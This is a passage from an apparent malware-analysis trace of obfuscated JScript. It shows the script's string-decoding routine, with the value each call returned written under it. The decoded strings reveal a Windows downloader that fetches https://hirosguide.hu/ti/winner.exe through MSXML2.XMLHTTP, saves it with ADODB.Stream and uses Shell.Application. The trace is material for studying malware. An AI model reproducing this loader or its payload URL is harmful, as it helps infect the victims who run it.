                                                                                                                                                                                                  • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                  • _0x3dc1(513,"0zEZ") ➔ "\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7"
                                                                                                                                                                                                  • _0x3dc1(509,"3o8g") ➔ "GET"
                                                                                                                                                                                                  75
                                                                                                                                                                                                  var _0x8d1f9c = _0x4495 ( );
                                                                                                                                                                                                  • _0x4495() ➔ Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG
                                                                                                                                                                                                  • _0x4495() ➔ ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application
                                                                                                                                                                                                  • _0x4495() ➔ pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream
                                                                                                                                                                                                  • _0x4495() ➔ pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream
                                                                                                                                                                                                  • _0x4495() ➔ vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0
                                                                                                                                                                                                  • _0x4495() ➔ vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0
                                                                                                                                                                                                  • _0x4495() ➔ FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9
                                                                                                                                                                                                  • _0x4495() ➔ cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo
                                                                                                                                                                                                  • _0x4495() ➔ 12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7
                                                                                                                                                                                                  • _0x4495() ➔ 12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7
                                                                                                                                                                                                  76
                                                                                                                                                                                                  return _0x3dc1 =
                                                                                                                                                                                                    77
                                                                                                                                                                                                    function (_0x12991c, _0x2f9be2) {
                                                                                                                                                                                                    • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                    • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                    • _0x3dc1(513,"0zEZ") ➔ "i\x05V"
                                                                                                                                                                                                    • _0x3dc1(509,"3o8g") ➔ undefined
                                                                                                                                                                                                    • _0x3dc1(513,"0zEZ") ➔ "\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S"
                                                                                                                                                                                                    • _0x3dc1(509,"3o8g") ➔ undefined
                                                                                                                                                                                                    • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                    • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                    • _0x3dc1(513,"0zEZ") ➔ "\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7"
                                                                                                                                                                                                    • _0x3dc1(509,"3o8g") ➔ "GET"
                                                                                                                                                                                                    78
                                                                                                                                                                                                    var _0x4157dc = _0x38e1, _0x1cea0e = _0x10bd;
                                                                                                                                                                                                      79
                                                                                                                                                                                                      _0x12991c = _0x12991c - 0x1e8;
                                                                                                                                                                                                        80
                                                                                                                                                                                                        var _0x3a7298 = _0x8d1f9c[_0x12991c];
                                                                                                                                                                                                          81
                                                                                                                                                                                                          if ( _0x3dc1['xEylaY'] === undefined )
                                                                                                                                                                                                            82
                                                                                                                                                                                                            {
                                                                                                                                                                                                              83
                                                                                                                                                                                                              var _0x5410d1 = function (_0x446218) {
                                                                                                                                                                                                              • _0x5410d1("DeleteFile") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("438285eiwTzG") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("iCoWWQi") ➔ "!\xf0\xa2"
                                                                                                                                                                                                              • _0x5410d1("https://hirosguide.hu/ti/winner.exe") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("WPZdJwWYW5RcT3RdGGGnlgBcSq") ➔ "\x9c\xcdl2\xda\xb7z\xc2\x08 ,f\xb1"
                                                                                                                                                                                                              • _0x5410d1("Open") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("891608JWBVoS") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("Close") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa") ➔ "\xbeZS=o\x88\xa9\xdb\x1f$Y\xb1\xea\x800\x88b\xbf\x8e\x92\xc0h\xc5\xa81|"
                                                                                                                                                                                                              • _0x5410d1("iCoWWQi") ➔ "!\xf0\xa2"
                                                                                                                                                                                                              84
                                                                                                                                                                                                              var _0x3bbb8a = _0x10bd, _0x4781c3 = _0x38e1, _0x318336 = _0x4781c3 ( 0xcd, 'oC51' ), _0x4610ab = '', _0x33424c = '';
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              85
                                                                                                                                                                                                              for ( var _0x409d8b = 0x0, _0x9a4e6c, _0x5a04e3, _0x582bf6 = 0x0 ; _0x5a04e3 = _0x446218[_0x4781c3 ( 0xa4, '6[Et' ) ] ( _0x582bf6 ++ ) ; ~ _0x5a04e3 && ( _0x9a4e6c = _0x409d8b % 0x4 ? _0x9a4e6c * 0x40 + _0x5a04e3 : _0x5a04e3, _0x409d8b ++ % 0x4 ) ? _0x4610ab += String['fromCharCode'] ( 0xff & _0x9a4e6c >> ( - 0x2 * _0x409d8b & 0x6 ) ) : 0x0 )
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              86
                                                                                                                                                                                                              {
                                                                                                                                                                                                                87
                                                                                                                                                                                                                _0x5a04e3 = _0x318336[_0x3bbb8a ( 0xad ) ] ( _0x5a04e3 );
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                88
                                                                                                                                                                                                                }
                                                                                                                                                                                                                  89
                                                                                                                                                                                                                  for ( var _0x5a46f3 = 0x0, _0x2540b3 = _0x4610ab['length'] ; _0x5a46f3 < _0x2540b3 ; _0x5a46f3 ++ )
                                                                                                                                                                                                                    90
                                                                                                                                                                                                                    {
                                                                                                                                                                                                                      91
                                                                                                                                                                                                                      _0x33424c += '%' + ( '00' + _0x4610ab[_0x4781c3 ( 0xd5, '&U@C' ) ] ( _0x5a46f3 ) ['toString'] ( 0x10 ) )[_0x4781c3 ( 0xd3, 'uW23' ) ] ( - 0x2 );
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      92
                                                                                                                                                                                                                      }
                                                                                                                                                                                                                        93
                                                                                                                                                                                                                        return decodeURIComponent ( _0x33424c );
                                                                                                                                                                                                                        • decodeURIComponent("%74%42%c4%4c%47%c8%2c") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%e3%7f%36%f3%91%08%5a%d6%60") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%21%c3%b0%c2%a2") ➔ "!\xf0\xa2"
                                                                                                                                                                                                                        • decodeURIComponent("%1d%34%cf%4b%ff%c7%21%13%92%19%42%03%10%75%3f%4c%8f%d6%20%d3%44%44%45%c4") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%c2%9c%c3%8d%6c%32%c3%9a%c2%b7%7a%c3%82%08%0d%2c%66%c2%b1") ➔ "\x9c\xcdl2\xda\xb7z\xc2\x08 ,f\xb1"
                                                                                                                                                                                                                        • decodeURIComponent("%a0%f1%0d") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%f3%dd%7a%d3%c8%f0%6e%f3%ac") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%70%b3%92") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%c2%be%5a%53%3d%6f%c2%88%c2%a9%c3%9b%1f%24%59%c2%b1%c3%aa%c2%80%30%c2%88%62%c2%bf%c2%8e%c2%92%c3%80%68%c3%85%c2%a8%31%7c") ➔ "\xbeZS=o\x88\xa9\xdb\x1f$Y\xb1\xea\x800\x88b\xbf\x8e\x92\xc0h\xc5\xa81|"
                                                                                                                                                                                                                        • decodeURIComponent("%21%c3%b0%c2%a2") ➔ "!\xf0\xa2"
                                                                                                                                                                                                                        94
                                                                                                                                                                                                                        },
                                                                                                                                                                                                                          95
                                                                                                                                                                                                                          _0xe1f1d8 = function (_0x4281c2, _0xf5bb28) {
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("DeleteFile","0zEZ") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("438285eiwTzG","0zEZ") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("iCoWWQi","0zEZ") ➔ "i\x05V"
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("https://hirosguide.hu/ti/winner.exe","3o8g") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("WPZdJwWYW5RcT3RdGGGnlgBcSq","0zEZ") ➔ "\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S"
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("Open","3o8g") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("891608JWBVoS","0zEZ") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("Close","0zEZ") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa","0zEZ") ➔ "\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7"
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("iCoWWQi","3o8g") ➔ "GET"
                                                                                                                                                                                                                          96
                                                                                                                                                                                                                          var _0x11181f = _0x10bd, _0x312d50 = _0x38e1, _0xe93937 = [], _0x255cdd = 0x0, _0x1f0222, _0x512427 = '';
                                                                                                                                                                                                                            97
                                                                                                                                                                                                                            _0x4281c2 = _0x5410d1 ( _0x4281c2 );
                                                                                                                                                                                                                            • _0x5410d1("DeleteFile") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("438285eiwTzG") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("iCoWWQi") ➔ "!\xf0\xa2"
                                                                                                                                                                                                                            • _0x5410d1("https://hirosguide.hu/ti/winner.exe") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("WPZdJwWYW5RcT3RdGGGnlgBcSq") ➔ "\x9c\xcdl2\xda\xb7z\xc2\x08 ,f\xb1"
                                                                                                                                                                                                                            • _0x5410d1("Open") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("891608JWBVoS") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("Close") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa") ➔ "\xbeZS=o\x88\xa9\xdb\x1f$Y\xb1\xea\x800\x88b\xbf\x8e\x92\xc0h\xc5\xa81|"
                                                                                                                                                                                                                            • _0x5410d1("iCoWWQi") ➔ "!\xf0\xa2"
                                                                                                                                                                                                                            98
                                                                                                                                                                                                                            var _0x19a55c;
                                                                                                                                                                                                                              99
                                                                                                                                                                                                                              for ( _0x19a55c = 0x0 ; _0x19a55c < 0x100 ; _0x19a55c ++ )
                                                                                                                                                                                                                                100
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                  101
                                                                                                                                                                                                                                  _0xe93937[_0x19a55c] = _0x19a55c;
                                                                                                                                                                                                                                    102
                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                      103
                                                                                                                                                                                                                                      for ( _0x19a55c = 0x0 ; _0x19a55c < 0x100 ; _0x19a55c ++ )
                                                                                                                                                                                                                                        104
                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                          105
                                                                                                                                                                                                                                          _0x255cdd = ( _0x255cdd + _0xe93937[_0x19a55c] + _0xf5bb28[_0x312d50 ( 0xc3, '*CwY' ) ] ( _0x19a55c % _0xf5bb28[_0x312d50 ( 0xb4, 'Kbvm' ) ] ) ) % 0x100, _0x1f0222 = _0xe93937[_0x19a55c], _0xe93937[_0x19a55c] = _0xe93937[_0x255cdd], _0xe93937[_0x255cdd] = _0x1f0222;
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          106
                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                            107
                                                                                                                                                                                                                                            _0x19a55c = 0x0, _0x255cdd = 0x0;
                                                                                                                                                                                                                                              108
                                                                                                                                                                                                                                              for ( var _0x705753 = 0x0 ; _0x705753 < _0x4281c2[_0x11181f ( 0xc6 ) ] ; _0x705753 ++ )
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              109
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                110
                                                                                                                                                                                                                                                _0x19a55c = ( _0x19a55c + 0x1 ) % 0x100, _0x255cdd = ( _0x255cdd + _0xe93937[_0x19a55c] ) % 0x100, _0x1f0222 = _0xe93937[_0x19a55c], _0xe93937[_0x19a55c] = _0xe93937[_0x255cdd], _0xe93937[_0x255cdd] = _0x1f0222, _0x512427 += String['fromCharCode'] ( _0x4281c2[_0x312d50 ( 0xd2, 'z&ot' ) ] ( _0x705753 ) ^ _0xe93937[( _0xe93937[_0x19a55c] + _0xe93937[_0x255cdd] ) % 0x100] );
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
